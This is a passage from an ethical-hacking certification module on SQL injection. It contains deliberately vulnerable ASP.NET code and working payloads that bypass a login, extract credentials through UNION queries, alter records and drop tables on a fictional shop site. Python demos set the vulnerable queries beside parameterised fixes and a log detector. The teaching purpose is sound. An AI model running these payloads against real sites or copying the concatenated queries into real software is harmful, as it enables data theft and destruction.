Ethical Hacking and Countermeasures V8
Module 14: SQL Injection
Exam 312-50 Certified Ethical Hacker
Module 14 Page 1987

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.

Security News

Barclays: 97 Percent of Data Breaches Still Due to SQL Injection
Source: http://news.techworld.com

SQL injection attacks have been around for more than ten years, and security professionals are
more than capable of protecting against them; yet 97 percent of data breaches worldwide are
still due to an SQL injection somewhere along the line, according to Neira Jones, head of
payment security for Barclaycard.
Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that
hackers are taking advantage of businesses with inadequate and often outdated information
security practices. Citing the most recent figures from the National Fraud Authority, she said
that identity fraud costs the UK more than £2.7 billion every year, and affects more than 1.8
million people.
"Data breaches have become a statistical certainty," said Jones. "If you look at what the public
individual is concerned about, protecting personal information is actually at the same level in
the scale of public social concerns as preventing crime."


SQL injection is a code injection technique that exploits security vulnerability in a website's
software. Arbitrary data is inserted into a string of code that is eventually executed by a
database. The result is that the attacker can execute arbitrary SQL queries or commands on the
backend database server through the web application.
In October 2011, for example, attackers planted malicious JavaScript on Microsoft's ASP.Net
platform. This caused the visitor's browser to load an iframe with one of two remote sites.
From there, the iframe attempted to plant malware on the visitor's PC via a number of browser
drive-by exploits.
Microsoft has been offering ASP.Net programmers information on how to protect against SQL
injection attacks since at least 2005. However, the attack still managed to affect around
180,000 pages.
Jones said that, with the number of interconnected devices on the planet set to exceed the
number of humans by 2015, cybercrime and data protection need to take higher priority on the
board's agenda. In order for this to happen, however, the Chief Information Security Officer
(CISO) needs to assess the level of risk within their organisation, and take one step at a time.
"I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in
heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real,
but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL
injections? And have they coded their web application securely?"
Generally it takes between 6 and 8 months for an organisation to find out it has been breached,
Jones added. However, by understanding their risk profile and taking simple proactive
measures, such as threat scenario modelling, companies could prevent 87 percent of attacks.

Copyright © IDG 2012
By Sophie Curtis
http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/



Module Objectives

This module introduces you to the concept of SQL injection and how an attacker can exploit
this attack methodology on the Internet. At the end of this module, you will be familiar with:

- SQL Injection
- Advanced SQL Injection
- SQL Injection Attacks
- Bypass Website Logins Using SQL Injection
- SQL Injection Detection
- Password Grabbing
- SQL Injection Attack Characters
- Network Reconnaissance Using SQL Injection
- Testing for SQL Injection
- SQL Injection Tools
- Types of SQL Injection
- Evasion Techniques
- Blind SQL Injection
- How to Defend Against SQL Injection Attacks
- SQL Injection Methodology
- SQL Injection Detection Tools


Module Flow

To understand SQL injection and its impact on the network or system, let us begin with the
basic concepts of SQL injection. SQL injection is a type of code injection that exploits
security vulnerabilities in the database layer of an application. These vulnerabilities mostly
arise when user input is incorrectly filtered for string-literal escape characters embedded in
SQL statements, or when user input is not strongly typed and is executed without being
validated.


Module flow:

- SQL Injection Concepts
- Testing for SQL Injection
- Types of SQL Injection
- Blind SQL Injection
- SQL Injection Methodology
- Advanced SQL Injection
- SQL Injection Tools
- Evasion Techniques
- Countermeasures

This section introduces you to SQL injection and the threats and attacks associated with it.


SQL Injection
SQL injection is a type of web application vulnerability in which an attacker can manipulate
and submit a SQL command to retrieve information from the database. The attack occurs when a
web application uses user-provided data in a query without validating or encoding it. It can
give the attacker access to sensitive information such as social security numbers, credit card
numbers, or other financial data, and allows the attacker to create, read, update, alter, or
delete data stored in the backend database. It is a flaw in web applications, not a database
or web server issue. Most programmers are still not aware of this threat.


Scenario

Albert Gonzalez, an indicted hacker, stole 130 million credit and debit card numbers in the
biggest identity theft case ever prosecuted in the United States. He used SQL injection
attacks to install sniffer software on the companies' servers to intercept credit card data as
it was being processed.

Source: http://www.theregister.co.uk


SQL Injection Is the Most Prevalent Vulnerability in 2012

Source: http://hackmageddon.com

According to http://hackmageddon.com, SQL injection is the attack most commonly used to break
the security of a web application. From the statistics recorded in September 2012, SQL
injection was the most frequently used type of cyber-attack when compared to other attacks.

FIGURE 14.1: SQL Injection (attack categories in the chart: SQL Injection, Unknown, DDoS,
Defacement, Targeted Attack, DNS Hijack, Password Cracking, Account Hijacking, Java
Vulnerability, Other)


SQL Injection Threats
The following are the major threats of SQL injection:

- Spoofing identity: Identity spoofing deceives people into believing that an email or website
  originated from a source it did not; with SQL injection, an attacker who can read or alter
  user records in the database can impersonate legitimate users.
- Changing prices: SQL injection can be used to modify data. An attacker breaks into an online
  shopping portal, changes the prices of products, and then purchases them at the reduced
  price.
- Tampering with database records: Data is damaged by alteration; it may even be completely
  replaced or deleted.
- Escalation of privileges: Once the system is compromised, the attacker seeks the higher
  privileges held by administrative accounts and gains complete access to the system as well
  as the network.
- Denial-of-service on the server: Users are no longer able to reach the system. More and more
  requests are sent to a server that cannot handle them, which results in a temporary halt in
  the server's services.
- Complete disclosure of all data on the system: Once the network is compromised, crucial and
  highly confidential data such as credit card numbers, employee details, and financial
  records is disclosed.
- Destruction of data: After gaining complete control over the system, the attacker destroys
  the data, resulting in huge losses for the company.
- Voiding the system's critical transactions: An attacker can operate the system and halt all
  the crucial transactions it performs.
- Modifying records: Attackers can modify the company's records, a major setback for the
  company's database management system.


What Is SQL Injection?
Structured Query Language (SQL) is a textual language for interacting with a database server.
SQL commands such as SELECT, INSERT, UPDATE, and DELETE perform operations on the database;
programmers use them to manipulate data on the database server.

SQL injection is a technique that takes advantage of non-validated input vulnerabilities to
inject SQL commands through a web application so that they are executed by the back-end
database. Programmers commonly build SQL commands by concatenating client-supplied parameters
into the query string, which makes it easy for attackers to inject commands of their own.
Attackers can then execute arbitrary SQL queries on the database server through the web
application, either to gain unauthorized access to the database or to retrieve information
directly from it.


SQL Injection Attacks
Based on the application and how it processes user-supplied data, SQL injection can be used
to perform the following types of attacks:

- Authentication bypass: The attacker logs on to the application without providing a valid
  username or password and may gain administrative privileges.
- Information disclosure: After unauthorized entry, the attacker obtains sensitive data stored
  in the database.
- Compromised data integrity: The attacker defaces a web page, inserts malicious content into
  web pages, or alters the contents of the database.
- Compromised availability of data: The attacker deletes database information, or deletes the
  log or audit information stored in the database.
- Remote code execution: The attacker can modify, delete, or create data, create new accounts
  with full user rights on servers that share files and folders, and ultimately compromise the
  host operating system.
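The following Python example is added here and is not code from the original module. It demonstrates two of the outcomes listed above, information disclosure and compromised data integrity (the "changing prices" and "tamper with database records" threats from the threats list), against a constructed in-memory SQLite database: a product search that splices its filter term into the SQL, a price-update function that splices a numeric id, and the parameterized version of each. The shop schema, its rows, the payloads and the function names are all assumptions made for this example.

```python
import sqlite3


# Constructed sample schema and rows for this example (not the page's Northwind database).
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'Chai', 18.0), (2, 'Chang', 19.0), (3, 'Syrup', 10.0);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('jason', 'Springfield'), ('admin', 'hunter2');
    """)
    return con


# --- Information disclosure: UNION through a product search -------------------

def search_vulnerable(con, term):
    # Same mistake as the module's BadLogin.aspx: the user's text is spliced into
    # the SQL, so a quote ends the literal and the rest is parsed as SQL.
    qry = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return con.execute(qry).fetchall()


def search_safe(con, term):
    # Parameterized: the value travels separately from the SQL text and can only
    # be matched as data, never parsed as part of the statement.
    qry = "SELECT name, price FROM products WHERE name LIKE ?"
    return con.execute(qry, ("%" + term + "%",)).fetchall()


# Matches no product, appends every credential row, and comments out the trailing %'.
DISCLOSE_PAYLOAD = "x%' UNION SELECT username, password FROM users --"


# --- Compromised data integrity: changing prices through a numeric parameter ---

def set_price_vulnerable(con, product_id, price):
    # A numeric field is used bare, so no quote is needed to break out of it.
    qry = ("UPDATE products SET price = " + str(float(price)) +
           " WHERE id = " + product_id)
    con.execute(qry)
    con.commit()


def set_price_safe(con, product_id, price):
    # int() rejects anything that is not a whole number before it reaches the
    # DBMS, and the placeholder carries it as a value rather than SQL text.
    con.execute("UPDATE products SET price = ? WHERE id = ?",
                (float(price), int(product_id)))
    con.commit()


# Turns "WHERE id = 1" into "WHERE id = 1 OR 1=1", so every row gets the new price.
TAMPER_PAYLOAD = "1 OR 1=1"


def prices(con):
    return dict(con.execute("SELECT id, price FROM products ORDER BY id"))


if __name__ == "__main__":
    con = build_db()
    print("vulnerable search:", search_vulnerable(con, DISCLOSE_PAYLOAD))
    print("safe search:      ", search_safe(con, DISCLOSE_PAYLOAD))
    set_price_vulnerable(con, TAMPER_PAYLOAD, 0.01)
    print("prices after tamper:", prices(con))
```

The vulnerable search returns the contents of the users table alongside (here, instead of) product rows because the UNION runs inside the same statement, which is the disclosure the list above describes. The vulnerable price update shows that quoting is not the only escape: an unquoted numeric id is just as injectable, and the tautology rewrites every row. Both safe variants use bound parameters; the price update additionally converts the id to int so that anything other than a whole number is rejected before a query is even built.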


How Web Applications Work

Example request: http://juggyboy.com/?id=6329&print=Y

Path of the request: Internet -> Firewall -> Web Server -> Web Application -> DBMS (the web
application and DBMS run on top of the operating system via OS system calls)

Query issued at the DBMS: SELECT * from news where id = 6329

Returned row: ID 6329, Topic Tech, News CNN
A web application is a software program that users access over a network through a web
browser (Internet Explorer, Mozilla Firefox, etc.), from any computer on the network. Pages may
render slightly differently from one browser to another, and overall response time and speed
depend on connection speed.

Step 1: The user's browser sends a request over the Internet to the web server.
Step 2: The web server accepts the request and forwards it to the applicable web application
server.
Step 3: The web application server performs the requested task.
Step 4: The web application queries the database and returns the result to the web server.
Step 5: The web server sends the response back to the user, completing the transaction.
Step 6: The information the user requested appears in the user's browser.


FIGURE 14.2: Working of Web Applications (the request with id=6329 becomes
SELECT * from news where id = 6329 and returns the row ID 6329, Topic Tech, News CNN)


Server-side Technologies
Server-side technology runs on the server in a client/server architecture. Business success
depends not only on information but on speed and efficiency, and server-side technology lets
us access, deliver, store, and retrieve information smoothly. Server-side technologies include
ASP, ASP.NET, ColdFusion, JSP, PHP, Python, and Ruby on Rails. Server-side technologies like
ASP.NET combined with SQL can easily be exploited using SQL injection.

- Powerful server-side technologies like ASP.NET and database servers allow developers to
  create dynamic, data-driven websites with incredible ease.
- All relational databases (SQL Server, Oracle, IBM DB2, MySQL) are susceptible to SQL
  injection attacks.
- SQL injection attacks do not exploit a specific software vulnerability; instead they target
  websites that do not follow secure coding practices for accessing and manipulating data
  stored in a relational database.
- The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection
  attacks.


HTTP POST Request

Example request: http://juggyboy.com/logon.aspx?username=bart&password=simpson
An HTTP POST request provides a way of passing larger sets of data to the server, and POST
requests are the usual way of communicating with an XML web service. These methods are
designed for data submission and retrieval on a web server.

When a user provides information and clicks Submit, the browser sends a string containing the
user's credentials to the web server. This string is visible in the body of the HTTP or HTTPS
POST request, and the application turns it into the following query at the database:

select * from Users where (username = 'bart' and password = 'simpson');

The login form that produces the request:

<form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
Password: <input type=password name=password>
<input type=submit value=Login>
</form>

Example 1: Normal SQL Query

http://juggyboy.com/BadLogin.aspx

Server-side code (BadLogin.aspx.cs):

private void cmdLogin_Click(object sender, System.EventArgs e)
{
    string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
    SqlConnection cnx = new SqlConnection(strCnx);
    cnx.Open();

    // This code is susceptible to SQL injection attacks.
    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text +
                    "' AND Password='" + txtPassword.Text + "'";
    int intRecs;
    SqlCommand cmd = new SqlCommand(strQry, cnx);
    intRecs = (int) cmd.ExecuteScalar();
    if (intRecs > 0)
    {
        FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
    }
    else
    {
        lblMsg.Text = "Login attempt failed.";
    }
    cnx.Close();
}

Constructed SQL query (user enters Jason / Springfield in the web browser):

SELECT Count(*) FROM Users WHERE UserName='Jason' AND Password='Springfield'

Here the term "query" is used for SQL commands. All SQL code is written in the form of a query
statement and then executed. Operations expressed as SQL queries include selecting data,
inserting or updating data, and creating data objects such as databases and tables. Every
query statement begins with a keyword such as SELECT, UPDATE, CREATE, or DELETE.

SQL Query Examples:


FIGURE 14.3: SQL Query Example (screenshot of the BadLogin.aspx server-side code and the
constructed query SELECT Count(*) FROM Users WHERE UserName='Jason' AND Password='Springfield')


Example 1: SQL Injection Query

http://juggyboy.com/BadLogin.aspx

The most common operation in SQL is the query, performed with the declarative SELECT
statement, which retrieves data from one or more tables. A SQL query lets the user describe
the desired data and leaves the DBMS (Database Management System) responsible for planning,
optimizing, and performing the physical operations. The SELECT keyword is followed by the list
of columns to be included in the final result.

If the information submitted by a browser to a web application is inserted into a database
query without being properly checked, SQL injection becomes possible. A typical example is an
HTML form that receives a username and password from the user and passes them to an Active
Server Pages (ASP) script running on an IIS web server, which checks the two values by
querying a SQL Server database.

Attacker launching SQL injection:

username: Blah' or 1=1 --
password: Springfield

The query executed is:

SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield';

Because everything after -- is a comment, the query the database actually evaluates is:

SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1

However, the ASP script builds the query from user data using the following line:

query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"

If the username is a single-quote character (') the effective query becomes:

SELECT * FROM users WHERE username = ''' AND password = 'Springfield';

This is invalid SQL syntax and produces a SQL Server error message in the user's browser:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''.
/login.asp, line 16

The quotation mark provided by the user closes the first one, and the second is left unclosed,
which generates the error. At this point an attacker can begin injecting strings into the
query to customize its behavior. Content following a double hyphen (--) is a Transact-SQL
comment, so everything after it is ignored by the database.
FIGURE 14.4: SQL Injection Query Example (attacker input Blah' or 1=1 -- / Springfield;
query executed: SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND
Password='Springfield'; code after -- is a comment)


Example 1: Code Analysis
Code analysis is the process of automated testing of the source code for the purpose
of debugging before the software is released for sale or distribution.

A user enters a user name and password that matches a record in the Users table

A dynamically generated SQL query is used to retrieve the number of matching rows

The user is then authenticated and redirected to the requested page
When the attacker enters blah' or 1=1 -- then the SQL query can look like:
SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of a comment in SQL, the query simply
becomes:
SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1
The query string is built as:
string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "' AND Password='" + txtPassword.Text + "'";

Example 2: BadProductList.aspx
This page (http://juggyboy.com/BadProductList.aspx) displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example (BadLogin.aspx), this code is vulnerable to SQL injection attacks: the executed SQL is constructed dynamically from user-supplied input.

private void cmdFilter_Click(object sender, System.EventArgs e) {
    dgrProducts.CurrentPageIndex = 0;
    bindDataGrid();
}

private void bindDataGrid() {
    dgrProducts.DataSource = createDataView();
    dgrProducts.DataBind();
}

private DataView createDataView() {
    string strCnx = "server=localhost;uid=sa;pwd=;database=northwind;";
    string strSQL = "SELECT ProductId, ProductName, " +
                    "QuantityPerUnit, UnitPrice FROM Products";
    // This code is susceptible to SQL injection attacks.
    if (txtFilter.Text.Length > 0) {
        // Attack occurs here: the filter text is concatenated into the SQL
        strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
    }
    SqlConnection cnx = new SqlConnection(strCnx);
    SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
    DataTable dtProducts = new DataTable();
    sda.Fill(dtProducts);
    return dtProducts.DefaultView;
}

Example 2: BadProductList.aspx
Source: http://msdn.microsoft.com
This page displays products from the Northwind database and allows users to filter the
resulting list of products using a textbox called txtFilter. Like the last example, the page is ripe
for SQL injection attacks because the executed SQL is constructed dynamically from a user-entered value. This particular page is a hacker's paradise because it can be hijacked by the
astute hacker to reveal secret information, change data in the database, damage the database
records, and even create new database user accounts.
Most SQL-compliant databases, including SQL Server, store metadata in a series of system tables
with the names sysobjects, syscolumns, sysindexes, and so on. This means that a hacker could use
the system tables to ascertain schema information for a database to assist in the further
compromise of the database. For example, the following text entered into the txtFilter textbox
might be used to reveal the names of the user tables in the database:
UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype = 'U' --
The UNION statement in particular is useful to a hacker because it allows him or her to splice
the results of one query onto another. In this case, the hacker has spliced the names of the user
tables in the database to the original query of the Products table. The only trick is to match the
number and data types of the columns to the original query. The previous query might reveal


that a table named Users exists in the database. A second query could reveal the columns in the
Users table. Using this information, the hacker might enter the following into the txtFilter
textbox:
UNION SELECT 0, UserName, Password, 0 FROM Users --
Entering this query reveals the user names and passwords found in the Users table.
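The two vulnerable queries from Examples 1 and 2, rebuilt as an added example (not code from the module or the MSDN article it cites) in Python against an in-memory SQLite database so each can be run beside a parameterised version; SQLite stands in for SQL Server, and the Users and Products rows are constructed for the demo.

```python
"""Added example: BadLogin.aspx (Example 1) and BadProductList.aspx (Example 2)
rebuilt in Python. Each query appears in the string-concatenating form the page
shows and in a parameterised form. SQLite replaces SQL Server; table and column
names follow the page, the rows are constructed."""
import sqlite3

# Constructed sample data standing in for the Users and Northwind Products tables.
USERS = [("alice", "Springfield"), ("bob", "hunter2")]
PRODUCTS = [(1, "Chai", "10 boxes x 20 bags", 18.0),
            (2, "Chang", "24 - 12 oz bottles", 19.0)]


def make_db():
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    cnx.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    cnx.execute("CREATE TABLE Products (ProductId INTEGER, ProductName TEXT, "
                "QuantityPerUnit TEXT, UnitPrice REAL)")
    cnx.executemany("INSERT INTO Products VALUES (?, ?, ?, ?)", PRODUCTS)
    return cnx


# --- Example 1: BadLogin.aspx -------------------------------------------------
def bad_login_count(cnx, user, password):
    """Mirrors strQry on the page: the input is spliced into the SQL text, so a
    quote ends the literal and -- comments out the password check."""
    sql = ("SELECT Count(*) FROM Users WHERE UserName='" + user +
           "' AND Password='" + password + "'")
    return cnx.execute(sql).fetchone()[0]


def safe_login_count(cnx, user, password):
    """Parameterised version: the driver passes the values separately, so
    quotes and -- in the input are data, never SQL syntax."""
    sql = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(sql, (user, password)).fetchone()[0]


# --- Example 2: BadProductList.aspx -------------------------------------------
def bad_product_filter(cnx, filter_text):
    """Mirrors createDataView(): the LIKE pattern is concatenated in."""
    sql = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    if len(filter_text) > 0:
        sql += " WHERE ProductName LIKE '" + filter_text + "'"  # attack occurs here
    return cnx.execute(sql).fetchall()


def safe_product_filter(cnx, filter_text):
    """Same query with the pattern bound as a parameter."""
    sql = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    params = ()
    if len(filter_text) > 0:
        sql += " WHERE ProductName LIKE ?"
        params = (filter_text,)
    return cnx.execute(sql, params).fetchall()


def demo():
    """Run the page's two inputs through both versions of each query."""
    cnx = make_db()
    tautology = "blah' or 1=1 --"  # Example 1 input
    union = "blah' UNION SELECT 0, UserName, Password, 0 FROM Users --"  # Example 2
    return {
        "bad_login": bad_login_count(cnx, tautology, ""),    # every row matches
        "safe_login": safe_login_count(cnx, tautology, ""),  # no such user: 0
        "bad_filter": bad_product_filter(cnx, union),        # Users rows spliced in
        "safe_filter": safe_product_filter(cnx, union),      # no such product: []
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```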

[Figure: source listing of BadProductList.aspx, as reproduced above]
FIGURE 14.5: BadProductList.aspx



Example 2: Attack Analysis
Any website has a search bar for users to search for data; if the application does not check the
data entered there for malicious content, attackers can use the search bar to inject SQL.
When you enter the value into the search box as: blah' UNION Select 0, username, password, 0 from users --
SQL Query Executed:
SELECT ProductID, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE ProductName LIKE 'blah' UNION SELECT 0, username, password, 0 FROM USERS --
After executing the SQL query, it shows results with the user names and passwords.


[Figure: attacker enters blah' UNION Select 0, username, password, 0 from users -- into the "Search for Products" box at JuggyBoyShop.com (http://juggyboyshop.com); user names and passwords are displayed]
FIGURE 14.6: Attack Analysis


Example 3: Updating Table
To create the UPDATE command in the SQL query, the syntax is:
UPDATE "table_name"
SET "column_1" = [new value]
WHERE {condition}
For example, say we currently have a table as follows:
Table Store_Information
Store_Name    Sales   Date
Sydney        $100    Aug-06-2012
Melbourne     $200    Aug-07-2012
Queensland    $400    Aug-08-2012
Victoria      $800    Aug-09-2012
TABLE 14.1: Store Table
And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and
that particular entry needs to be updated. To do so, we use the following SQL query:


UPDATE Store_Information
SET Sales = 250
WHERE Store_Name = "Sydney"
AND Date = "08/06/2012"
The resulting table would look like this:
Table Store_Information
Store_Name    Sales   Date
Sydney        $250    Aug-06-2012
Melbourne     $200    Aug-07-2012
Queensland    $400    Aug-08-2012
Victoria      $800    Aug-09-2012
TABLE 14.2: Store Table After Updating



[Figure: attacker enters blah'; UPDATE jb-customers SET jb-email = 'info@juggyboy.com' WHERE email = 'jason@springfield.com'; -- into the Forgot Password email field at JuggyBoy.com]
SQL Query Executed:
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; UPDATE jb-customers SET jb-email = 'info@juggyboy.com' WHERE email = 'jason@springfield.com'; --';
FIGURE 14.7: SQL Injection Attack



Example 4: Adding New Records
The following example illustrates the process of adding new records to the table:
INSERT INTO table_name (column1, column2, column3...)
VALUES (value1, value2, value3...)
Store_Name    Sales   Date
Sydney        $250    Aug-06-2012
Melbourne     $200    Aug-07-2012
Queensland    $400    Aug-08-2012
Victoria      $800    Aug-09-2012
TABLE 14.3: Store Table
INSERT INTO table_name ("store_name", "sales", "date")
VALUES ("Adelaide", "$1000", "08/10/2012")


Store_Name    Sales   Date
Sydney        $250    Aug-06-2012
Melbourne     $200    Aug-07-2012
Queensland    $400    Aug-08-2012
Victoria      $800    Aug-09-2012
Adelaide      $1000   Aug-10-2012
TABLE 14.4: Store Table After Adding New Record

[Figure: attacker enters blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); -- into the Forgot Password email field at JuggyBoy.com]
SQL Query Executed:
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); --';
FIGURE 14.8: SQL Injection Attack



Example 5: Identifying the Table Name
[Figure: attacker enters blah' AND 1=(SELECT COUNT(*) FROM mytable); -- into the Forgot Password email field at JuggyBoy.com. You will need to guess table names here.]
SQL Query Executed:
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = 'blah' AND 1=(SELECT COUNT(*) FROM mytable); --
FIGURE 14.9: Identifying the Table Name



Example 6: Deleting a Table
[Figure: attacker enters blah'; DROP TABLE Creditcard; -- into the Forgot Password email field at JuggyBoy.com]
SQL Query Executed:
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; DROP TABLE Creditcard; --';
FIGURE 14.10: Deleting Table


Module Flow
So far, we have discussed various concepts of SQL injection. Now we will discuss how to
test for SQL injection. SQL injection attacks are attacks on web applications that rely on a
database in the background to store and produce data. Here attackers try to inject their own
SQL commands into those the web application issues to the database.

SQL Injection Concepts
Testing for SQL Injection
Types of SQL Injection
Blind SQL Injection
SQL Injection Methodology
Advanced SQL Injection
SQL Injection Tools
Evasion Techniques
Countermeasures


This section focuses on SQL injection attack characteristics and their detection.



SQL Injection Detection
The following are the steps to follow to identify SQL injection:

Step 1: Check if the web application connects to a Database Server in order to access some
data.
Step 2: List all input fields, hidden fields, and post requests whose values could be used in
crafting a SQL query.
Step 3: Attempt to inject code into the input fields to generate an error.
Step 4: Try to insert a string value where a number is expected in the input field.
Step 5: The UNION operator is used in SQL injections to join a query to the original query.
Step 6: Detailed error messages provide a wealth of information to an attacker in order to
execute SQL injection.



SQL Injection Error Messages
The attacker makes use of the database-level error messages disclosed by an
application. This is very useful to build a vulnerability exploit request. There are even chances of
automated exploits based on the different error messages generated by the database server.
These are the examples for the SQL injection attacks based on error messages:
Attempt to inject code such as a single quote ('), a semicolon (;), comments (--), AND, and OR
into the input fields to generate an error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shopping/buy.aspx, line 52
Try to insert a string value where a number is expected in the input field:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a column of data type int.
/visa/credit.aspx, line 17
Note: If applications do not provide detailed error messages and return a simple '500 Server
Error' or a custom error page, then attempt blind injection techniques.


SQL Injection Attack Characters
The following is a list of characters used by the attacker for SQL injection attacks:
Character                 Function
' or "                    Character string indicators
-- or #                   Single-line comment
/*...*/                   Multiple-line comment
+                         Addition, concatenate (or space in url)
||                        (Double pipe) concatenate
%                         Wildcard attribute indicator
?Param1=foo&Param2=bar    URL Parameters
PRINT                     Useful as non-transactional command
@variable                 Local variable
@@variable                Global variable
waitfor delay '0:0:10'    Time delay
@@version                 Displays SQL server version
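An added example (not part of the module) that serves both the error-message section above and this character table from the defender's side: a log-review check that flags request parameters carrying the listed characters and application error lines disclosing the ODBC messages. The request URLs and error lines are constructed for the demo.

```python
"""Added example: a small log-review check for the two signals the text
describes, attack characters in request parameters and ODBC error messages in
application error logs. All sample log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators from the character table above, matched against each URL-decoded
# parameter value. '#' and PRINT also occur in ordinary text, so single hits on
# those are weak signals when tuning the check.
INDICATORS = {
    "string_delimiter": re.compile(r"""['"]"""),
    "line_comment": re.compile(r"--|#"),
    "block_comment": re.compile(r"/\*"),
    "double_pipe_concat": re.compile(r"\|\|"),
    "global_variable": re.compile(r"@@\w+"),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL),
    "print_command": re.compile(r"\bprint\b", re.IGNORECASE),
}

# Error signatures from the error-message section above.
ERROR_SIGNATURES = {
    "80040e14": "Unclosed quotation mark before the character string",
    "80040e07": "Syntax error converting the varchar value",
}


def scan_request(url):
    """Return {parameter: [indicator names]} for every parameter that matches."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = unquote_plus(value)  # second pass catches double-encoded input (%2527)
        hits = [ind for ind, pat in INDICATORS.items() if pat.search(value)]
        if hits:
            findings[name] = hits
    return findings


def scan_error_line(line):
    """Return the ODBC error code an application error line discloses, else None."""
    match = re.search(r"error '(80040e[0-9a-f]{2})'", line)
    if match and match.group(1) in ERROR_SIGNATURES:
        return match.group(1)
    for code, text in ERROR_SIGNATURES.items():
        if text in line:
            return code
    return None


# Constructed sample requests and application error lines.
SAMPLE_REQUESTS = [
    "http://juggyboy.com/BadProductList.aspx?txtFilter=Chai",
    "http://juggyboy.com/BadLogin.aspx?txtUser=blah%27+or+1%3D1+--&txtPassword=",
    "http://juggyboy.com/BadProductList.aspx?txtFilter=blah%27+UNION+SELECT+0%2C+"
    "username%2C+password%2C+0+FROM+users+--",
    "http://juggyboy.com/search.aspx?q=1%3B+waitfor+delay+%270%3A0%3A10%27--",
]
SAMPLE_ERRORS = [
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL "
    "Server Driver][SQL Server]Unclosed quotation mark before the character string ''. "
    "/shopping/buy.aspx, line 52",
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL "
    "Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a "
    "column of data type int. /visa/credit.aspx, line 17",
    "Request for /BadProductList.aspx completed in 12 ms",
]


def review(requests=SAMPLE_REQUESTS, errors=SAMPLE_ERRORS):
    """Pair each flagged request with its findings; list disclosed error codes."""
    flagged = [(url, scan_request(url)) for url in requests if scan_request(url)]
    disclosed = [code for code in map(scan_error_line, errors) if code]
    return flagged, disclosed


if __name__ == "__main__":
    flagged, disclosed = review()
    for url, findings in flagged:
        print(url, findings)
    print("error codes disclosed:", disclosed)
```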



Additional Methods to Detect SQL Injection
SQL injection can be detected with the help of the following additional methods:

Function Testing
This testing falls within the scope of black box testing, and as such, should require no
knowledge of the inner design of the code or logic.

Fuzz Testing
Fuzz testing is a SQL injection testing technique used to discover coding errors by
inputting a massive amount of data to crash the web application.

Static/Dynamic Testing
Static/dynamic testing is the manual analysis of the web application source code.
Example of Function Testing:
http://juggyboy/?parameter=123
http://juggyboy/?parameter=1'
http://juggyboy/?parameter=1'#
http://juggyboy/?parameter=1"
http://juggyboy/?parameter=1 AND 1=1--
http://juggyboy/?parameter=1'--
http://juggyboy/?parameter=1 AND 1=2--
http://juggyboy/?parameter=1'/*
http://juggyboy/?parameter=1' AND '1'='1
http://juggyboy/?parameter=1 order by 1000



SQL Injection Black Box Pen Testing
In black box testing, the pen tester doesn't need to possess any knowledge about the
